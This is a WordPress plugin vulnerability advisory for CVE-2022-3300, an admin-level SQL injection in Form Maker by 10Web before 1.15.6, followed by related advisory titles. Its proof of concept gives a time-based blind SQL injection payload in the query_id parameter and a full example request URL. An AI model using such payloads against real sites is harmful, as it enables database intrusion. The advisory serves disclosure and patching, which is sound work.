Form Maker by 10Web < 1.15.6 – Admin+ SQLI | CVE 2022-3300 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

Proof of Concept

Create/edit a form, go to the Settings > MySQL Mapping (i.e /admin.php?page=manage_fm&task=edit&current_id=1&tab=4&fieldset_id=mapping). Copy the link to delete a query (create a query if there is none) and add the following payload in the query_id parameter: 1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)

e.g: https://example.com/wp-admin/admin.php?page=manage_fm&nonce_fm=27d813d111&task=remove_query&current_id=1&query_id=1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)&fieldset_id=mapping

Affects Plugins

Fixed in 1.15.6

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Nguyen Duy Quoc Khanh

Submitter

Nguyen Duy Quoc Khanh

Submitter twitter

Verified

Yes

WPVDB ID

ddc9ed69-d942-4fad-bbf4-1be3b86460d9

Timeline

Publicly Published

2022-10-03 (about 3 years ago)

Added

2022-10-03 (about 3 years ago)

Last Updated

2022-10-03 (about 3 years ago)

Other

Published

Title

Published

2025-03-27

Title

WPGuppy < 1.1.4 - Authenticated (Subscriber+) SQL Injection

Published

2023-01-23

Title

Pinpoint Booking System < 2.9.9.2.9 - Subscriber+ SQLi

Published

2014-08-01

Title

Booking System <= 1.2 - SQL Injection

Published

2014-08-01

Title

WP Forum Server 1.6.5 - index.php Multiple Parameter SQL Injection

Published

2014-12-02

Title

SP Client Document Manager < 2.4.4 - Multiple SQL Injection